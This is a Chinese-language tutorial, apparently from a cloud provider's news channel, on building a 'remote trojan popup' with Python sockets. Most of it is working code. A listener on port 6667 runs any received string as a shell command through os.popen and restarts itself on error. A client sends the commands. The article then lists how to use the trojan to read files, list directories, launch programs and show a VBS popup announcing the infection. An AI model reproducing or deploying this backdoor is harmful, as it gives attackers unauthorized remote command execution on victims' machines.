怎么使用Python?Socket實(shí)現(xiàn)遠(yuǎn)程木馬彈窗

這篇文章主要介紹了怎么使用Python Socket實(shí)現(xiàn)遠(yuǎn)程木馬彈窗的相關(guān)知識，內(nèi)容詳細(xì)易懂，操作簡單快捷，具有一定借鑒價(jià)值，相信大家閱讀完這篇怎么使用Python Socket實(shí)現(xiàn)遠(yuǎn)程木馬彈窗文章都會有所收獲，下面我們一起來看看吧。

基礎(chǔ)知識

• socket通信模塊：針對TCP/IP協(xié)議簇進(jìn)行的程序封裝，在Windows/Linux均有這樣底層模塊。

• Unicode 有多種存儲方式，常見的有 UTF-8、UTF-16、UTF-32，它們分別用不同的二進(jìn)制格式來表示 Unicode 字符

• 如果全部英文或英文與其他文字混合,但英文占絕大部分,用UTF-8就比UTF-16節(jié)省了很多空間.而如果全部是中文這樣類似的字符或者混合字符中中文占絕大多數(shù).UTF-16就占優(yōu)勢了,可以節(jié)省很多空間

編碼：

• 英文多：建議用UTF-8編碼（utf-8是使用最多的編碼方式，是一種變長字符編碼）

• 中文多：建議用UTF-16編碼

• 中文：window中文采用的是GBK格式編碼

netstat -ant ：只顯示傳輸層的數(shù)據(jù) TCP，UDP連接，可以用來檢查socket服務(wù)是否起了

服務(wù)端(server)程序

import socket, os
def attack():
    try:
        s = socket.socket()
        s.bind(('0.0.0.0', 6667)) #   使用缺省地址，所有設(shè)備均可訪問該服務(wù)器的6667端口
        s.listen()     #    對6667端口進(jìn)行監(jiān)聽
        chanel, client = s.accept() #   進(jìn)入阻塞狀態(tài)，accept() 返回元組，接受來自客戶端的數(shù)據(jù)，chanel:新的socket對象用于標(biāo)識出服務(wù)器和哪個(gè)客戶端連接進(jìn)行通信，  client: 客戶端的IP和端口
        while True:
            receive = chanel.recv(1024).decode()
            reply = os.popen(receive).read()
            chanel.send(f"命令{receive}的運(yùn)行結(jié)果:\n{reply}".encode())
    except:
        s.close()
        attack()
if __name__ == '__main__':
    attack()

客戶端(client)程序

import socket
s = socket.socket()
s.connect(('192.168.137.1', 6667))	#192.168.137.1是socket服務(wù)器的地址
while True:
    sendstr = input("請輸入消息：")
    s.send(sendstr.encode())
    receive = s.recv(1024).decode()
    print(f"服務(wù)器回復(fù)：{receive}")
    # s.close()

其他命令執(zhí)行函數(shù)

提示：需要導(dǎo)入 os 模塊—— import os

os.system('ipconfig')

os.popen('ipconfig').read()

eval()        # 將字符串按照Python代碼來執(zhí)行

該木馬程序的基本用法

1、查看文件內(nèi)容

window

type 文件絕對路徑

linux

cat 文件路徑

2、查看文件目錄

window

dir                #查看當(dāng)前文件路徑目錄
dir 文件路徑     #查看指定文件路徑目錄

linux

ls                #查看當(dāng)前文件路徑目錄
ll                #查看當(dāng)前文件路徑目錄詳細(xì)信息
ls 文件路徑         #查看指定文件路徑目錄
ll 文件路徑         #查看指定文件路徑目錄詳細(xì)信息

3、創(chuàng)建文件或目錄

windows

echo test >> demo.txt    #創(chuàng)建一個(gè)demo.txt文件，文件內(nèi)容為 test

linux

mkdir 路徑    #創(chuàng)建目錄
echo test >> demo.txt    #創(chuàng)建一個(gè)demo.txt文件，文件內(nèi)容為 test

4、調(diào)用windows應(yīng)用程序

調(diào)用計(jì)算器

calc.exe

調(diào)用其他引用程序

直接輸入應(yīng)用程序絕對路徑

5、調(diào)用Windows彈窗

echo msgbox("你中木馬了！！")  > E:\hi.vbs    
E:\hi.vbs

關(guān)于“怎么使用Python Socket實(shí)現(xiàn)遠(yuǎn)程木馬彈窗”這篇文章的內(nèi)容就介紹到這里，感謝各位的閱讀！相信大家對“怎么使用Python Socket實(shí)現(xiàn)遠(yuǎn)程木馬彈窗”知識都有一定的了解，大家如果還想學(xué)習(xí)更多知識，歡迎關(guān)注億速云行業(yè)資訊頻道。